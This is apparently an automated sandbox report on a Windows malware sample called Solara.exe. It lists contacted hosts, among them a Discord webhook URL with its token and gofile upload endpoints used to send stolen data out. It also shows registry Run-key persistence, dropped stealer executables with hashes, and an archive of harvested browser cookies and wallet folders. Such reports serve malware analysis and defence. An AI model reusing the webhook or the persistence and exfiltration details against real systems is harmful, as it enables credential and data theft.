                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://discordapp.com/api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9false
                              		high
                              http://ip-api.com/jsonfalse
                                		high
                                https://api.gofile.io/getServerfalse
                                  		high
                                  https://store1.gofile.io/uploadFilefalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1440404382.000001F990071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.mpowershell.exe, 00000003.00000002.1458447080.000001F9EFBD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1674670295.0000025669D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/pyca/cryptography/issues/8996Exela.exefalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1405932041.000001F980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1405932041.000001F980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1440404382.000001F990071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.microsoft.copowershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.micpowershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Iconpowershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/pyca/cryptography/issues/9253Exela.exefalse
                                                                		high
                                                                https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-fileExela.exefalse
                                                                  		high
                                                                  http://crl.micft.cMicRosofpowershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aka.ms/pscore68powershell.exe, 00000003.00000002.1405932041.000001F980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1405932041.000001F980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/pyca/cryptography/issuesExela.exefalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            208.95.112.1
                                                                            		ip-api.comUnited States
                                                                            		53334TUT-ASUSfalse
                                                                            80.240.16.67
                                                                            		unknownGermany
                                                                            		20473AS-CHOOPAUSfalse
                                                                            51.91.7.6
                                                                            		api.gofile.ioFrance
                                                                            		16276OVHFRfalse
                                                                            45.112.123.227
                                                                            		store1.gofile.ioSingapore
                                                                            		16509AMAZON-02USfalse
                                                                            162.159.135.233
                                                                            		unknownUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            162.159.134.233
                                                                            		discordapp.comUnited States
                                                                            		13335CLOUDFLARENETUSfalse

                                                                            Private

                                                                            IP
                                                                            127.0.0.1

                                                                            General Information

                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1589392
                                                                            Start date and time:2025-01-12 07:09:18 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 12m 52s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:104
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Solara.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.rans.troj.adwa.spyw.evad.mine.winEXE@155/141@5/7
                                                                            EGA Information:
                                                                            • Successful, ratio: 25%
                                                                            HCA Information:Failed
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, consent.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 172.202.163.200
                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target Solara.exe, PID 2044 because it is empty
                                                                            • Execution Graph export aborted for target Solara.exe, PID 3700 because there are no executed function
                                                                            • Execution Graph export aborted for target Solara.exe, PID 3896 because there are no executed function
                                                                            • Execution Graph export aborted for target Solara.exe, PID 5852 because it is empty
                                                                            • Execution Graph export aborted for target Solara.exe, PID 6364 because there are no executed function
                                                                            • Execution Graph export aborted for target conhost.exe, PID 4300 because there are no executed function
                                                                            • Execution Graph export aborted for target powershell.exe, PID 1512 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 1532 because it is empty
                                                                            • Execution Graph export aborted for target rdqanwpudvuj.exe, PID 7076 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Solara.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            01:10:29API Interceptor119x Sleep call for process: powershell.exe modified
                                                                            01:10:39API Interceptor2x Sleep call for process: Solara.exe modified
                                                                            07:10:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Solara C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                            07:10:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Solara C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                            07:11:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Exela C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                            07:11:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Exela C:\Users\user\AppData\Local\Temp\Exela.exe

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            208.95.112.1resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                            • ip-api.com/json/?fields=225545
                                                                            F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                            • ip-api.com/json/
                                                                            DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            80.240.16.67xmr new.exeGet hashmaliciousXmrigBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              discordapp.comgshv2.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.129.233
                                                                              PO_11171111221.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                              • 162.159.129.233
                                                                              WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                              • 162.159.129.233
                                                                              sNifdpWiY9.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                                              • 162.159.134.233
                                                                              saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                              • 162.159.129.233
                                                                              EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                              • 162.159.129.233
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.135.233
                                                                              file.exeGet hashmaliciousCStealerBrowse
                                                                              • 162.159.134.233
                                                                              https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                                                                              • 162.159.135.233
                                                                              RLesaPFXew.exeGet hashmaliciousSilverRatBrowse
                                                                              • 162.159.133.233
                                                                              s-part-0017.t-0009.t-msedge.nethttps://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 13.107.246.45
                                                                              http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                              • 13.107.246.45
                                                                              SAMPLE_5.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.45
                                                                              drW0xB3OBb.dllGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.45
                                                                              FEdTp2g4xD.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.107.246.45
                                                                              305861283730376077.jsGet hashmaliciousStrela DownloaderBrowse
                                                                              • 13.107.246.45
                                                                              1274320496157183071.jsGet hashmaliciousStrela DownloaderBrowse
                                                                              • 13.107.246.45
                                                                              944924352317221058.jsGet hashmaliciousStrela DownloaderBrowse
                                                                              • 13.107.246.45
                                                                              kzQ25HVUbf.exeGet hashmaliciousLokibotBrowse
                                                                              • 13.107.246.45
                                                                              huuG7N3jOv.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.107.246.45
                                                                              ip-api.comresembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                              • 208.95.112.1
                                                                              F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                              • 208.95.112.1
                                                                              DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                              • 208.95.112.1
                                                                              tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 208.95.112.1
                                                                              YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              OVHFRhttps://adopt0098.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 91.134.82.79
                                                                              https://talktalk770.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 217.182.178.233
                                                                              DB5rQYsfd6.exeGet hashmaliciousRemcosBrowse
                                                                              • 198.50.242.157
                                                                              https://ville-tonnerre.com/CR_CM/config/information.php?access.x61307366953&&data.x=en_3abae6f9aa37b42f5c9bf622cGet hashmaliciousUnknownBrowse
                                                                              • 213.186.33.19
                                                                              Yv24LkKBY6.exeGet hashmaliciousUnknownBrowse
                                                                              • 94.23.158.211
                                                                              Yv24LkKBY6.exeGet hashmaliciousUnknownBrowse
                                                                              • 94.23.158.211
                                                                              lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 151.80.4.227
                                                                              4.elfGet hashmaliciousUnknownBrowse
                                                                              • 164.133.191.35
                                                                              frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                                              • 51.178.95.194
                                                                              https://www.depoqq.win/genoGet hashmaliciousUnknownBrowse
                                                                              • 54.36.150.184
                                                                              AS-CHOOPAUS80P.exeGet hashmaliciousI2PRATBrowse
                                                                              • 207.246.88.73
                                                                              4.elfGet hashmaliciousUnknownBrowse
                                                                              • 44.40.164.148
                                                                              zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                              • 78.141.202.204
                                                                              Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                              • 44.40.164.150
                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                                              • 192.248.189.11
                                                                              miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                              • 44.175.18.157
                                                                              xmr new.exeGet hashmaliciousXmrigBrowse
                                                                              • 80.240.16.67
                                                                              eth.exeGet hashmaliciousXmrigBrowse
                                                                              • 192.248.189.11
                                                                              cZO.exeGet hashmaliciousUnknownBrowse
                                                                              • 108.61.189.74
                                                                              Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                              • 149.253.168.94
                                                                              TUT-ASUSresembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                              • 208.95.112.1
                                                                              F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                              • 208.95.112.1
                                                                              DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                              • 208.95.112.1
                                                                              tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 208.95.112.1
                                                                              YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\_MEI70882\VCRUNTIME140.dll9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                Holoscope-V1.3.5.exeGet hashmaliciousUnknownBrowse
                                                                                  dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                    winws1.exeGet hashmaliciousUnknownBrowse
                                                                                      discord.exeGet hashmaliciousUnknownBrowse
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                          cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                              HeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                meN9qeS2DE.exeGet hashmaliciousXWormBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9949634
                                                                                                  Entropy (8bit):7.9953008751482715
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:196608:bvcgJ3xukvmvNm1E8giq1g9KDeNMHFJMIDJ+gsAGKkRcSRK3ICT:Lc4m1m1NqV44Fqy+gs1hOIC
                                                                                                  MD5:0615D49BE12C174704A3DAAD945F7B56
                                                                                                  SHA1:90D67801DCFF362CE2C2ACCAFD5010C7F79567D6
                                                                                                  SHA-256:573A7F2FA701A7630318119D9E6D916CB8A0ACD87A0A2797B7197E9AE85C0071
                                                                                                  SHA-512:40D702B8FD2993AEEB09755E760D3611D76F927AE6831AB7066386D3A133257E06330DDFF2D28406B77C1D9E502E79A7A72B8984CE0D795948DA07DD03B9BEA9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...V@hg.........."....).....p...... ..........@.........................................`.................................................4...x....p..,....@..8"..............d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...,....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5527040
                                                                                                  Entropy (8bit):6.581917643476937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:WTbZDzL0GH1JmXFBbbYnHhcWACCR2rbh27ns0ftj371GJfo0PhtpQ9un:ebZDfHmXzIHSWbI2rAnXdxG5PhtpQM
                                                                                                  MD5:089094590DF5698B03A7428A5864ED33
                                                                                                  SHA1:6A4866B798A38E40B61095E2C4A6861B15F4CABB
                                                                                                  SHA-256:C3B138B65057D5A27D859763974A3AFE5DF2693CE64326D36AE8784D092929C7
                                                                                                  SHA-512:001C4AEEDDCBFAA9B979E81B742391C6EC6F9400B23B8B5827C69C7E8C36BD9E8576146F0487C3522DECA21E1488A36C948DFF3C69B2C441406F2081EAD09E4D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....dg.........."...........S.....@..........@..............................T...........`.................................................@...<.....P.. ...pP...............T.x...............................(.......8...............`............................text.............................. ..`.rdata...&.......(..................@..@.data....tO......^O.................@....pdata.......pP......,P.............@..@.00cfg........P.......P.............@..@.tls..........P......0P.............@....rsrc.... ....P.."...2P.............@..@.reloc..x.....T......TT.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9949634
                                                                                                  Entropy (8bit):7.9953008751482715
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:196608:bvcgJ3xukvmvNm1E8giq1g9KDeNMHFJMIDJ+gsAGKkRcSRK3ICT:Lc4m1m1NqV44Fqy+gs1hOIC
                                                                                                  MD5:0615D49BE12C174704A3DAAD945F7B56
                                                                                                  SHA1:90D67801DCFF362CE2C2ACCAFD5010C7F79567D6
                                                                                                  SHA-256:573A7F2FA701A7630318119D9E6D916CB8A0ACD87A0A2797B7197E9AE85C0071
                                                                                                  SHA-512:40D702B8FD2993AEEB09755E760D3611D76F927AE6831AB7066386D3A133257E06330DDFF2D28406B77C1D9E502E79A7A72B8984CE0D795948DA07DD03B9BEA9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...V@hg.........."....).....p...... ..........@.........................................`.................................................4...x....p..,....@..8"..............d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...,....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara.exe.log

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Solara.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):654
                                                                                                  Entropy (8bit):5.380476433908377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                  Malicious:true
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D.zip

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                  Category:dropped
                                                                                                  Size (bytes):672717
                                                                                                  Entropy (8bit):7.997988879641276
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:12288:4HDXpH8NIPE6Tp5JuK2DpveyOFTmzBAnooROh3+tZzf2T1rYzrDj:4jXpP/PJkNvO5mCooRO58f2T1cDj
                                                                                                  MD5:C586B2EC4E9D001FAB6A82C77FB7024E
                                                                                                  SHA1:1A2756E38A2D02462201B43A360C55F5FA866C75
                                                                                                  SHA-256:949B456B7B8F29C5F1A1A49EDA398E6E6360E5243505C4A324925063A16806AD
                                                                                                  SHA-512:8E19A0CCDD245498EFCA85FB6A4A9995F32322E2F9F2849C2D3BE4F18FA6CEEBCED836B6DD8F736FBCA1F51FD7972803612452D41AEC46738F9B886D3309435C
                                                                                                  Malicious:false
                                                                                                  Preview:PK........m.,Z................Browsers/PK........l.,Z................Wallets/PK........m.,ZG.W......E......Display (1).pngl..PS[..}.@.JG@z......wD.....F)RBM..T.(....R.......R.......$..{..o.a....a=.....I..4;.r.......m......`:C;.d......[3C.|Hp.......T....=...g....._O.A=.......5c.[!.,....>.0.:..u.K........t.+.T.......kT.CD..9?._..tG.sB.K;..........9z.cb88g.ff#}Z.F../U.}.%.e...5Wg....]O...+i..M{4...o.Y.R(N..p....~...>.+7{73H5b.....J...Yt'q.......*.......;.u.....q.P..`.s......y.Z..!.u..._..\.K...T"L4.g......|.....s.....L....,.]N)z>.....3..g.a......#C..oc+.....^...i.?......~y:_...S....+4Ku..E....n......9.......c=;....W._G..rX..:s.8..y...jU.7.u.. a9<..}...{.|Y.0 .J*.......MO=..0...R...;`.s..|=..'.....Jj................Zw.dU.>.U.c.xM...Q?V......F.._..|.f..$Q8gm.p.r.+.R..l.xkuJ.~...}N....F..=..._.\..l.U..4y.A.p..r.V...F...:oG.7......r.."..P.... ...Q?\^y.Pg.........i.OI. ...m@i]V.337..>g9t..`....3..<%<..P.PvN$.O.v...#..0.=....@.j..r..J(.

                                                                                                  C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Cookies.txt

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):432
                                                                                                  Entropy (8bit):5.365627083720754
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:Lv5hOs3rsLgxbh+3r4wyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqv5:L6s7JH+74xva3UhyL/8ObW0
                                                                                                  MD5:7C02C56F7D8D62510B3E7117500612A9
                                                                                                  SHA1:8F0FF1F5911101E6AB63418BB2FEBAACA431D2F2
                                                                                                  SHA-256:FF7A4ACC9936170BEC4315DC059166C35947BB1EBAFF79CB872BE680987802AA
                                                                                                  SHA-512:C21F998A73F557EBD6D4C4F160E5501B506B261E5D2CD058FAD0D9B453A469D640DFAF8970B3EB87A84FD3C4CBB0DE260309C1A769875E895DF88E8CCFE921A4
                                                                                                  Malicious:false
